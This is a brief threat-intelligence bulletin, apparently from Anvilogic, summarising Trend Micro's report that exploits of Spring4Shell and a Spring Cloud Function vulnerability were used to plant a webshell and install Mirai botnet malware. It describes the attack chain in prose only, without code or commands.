2022-04-13

Spring Exploits

Level: 
Tactical
  |  Source: 
Trend Micro
Technology
Share:

Spring Exploits

Trend Micro research has kept track of exploits for Spring Core (CVE-2022-22965/Spring4Shell) and Spring Cloud Functions (CVE-2022-22963). The exploits lead to the installation of Mirai malware. The earliest exploitation attempts tracked by the security firm were in the Singapore region. Threat actors exploiting the vulnerability were able to upload a webshell to download Mirai botnet malware. Following a permission change with chmod from the downloading malware, it is then executed. Lastly, a shell script executes to download binaries from an attacker-owned server, to install compatible versions of Mirai samples with different CPU architectures onto the victim host.

     

Get trending threats published weekly by the Anvilogic team.

Sign Up Now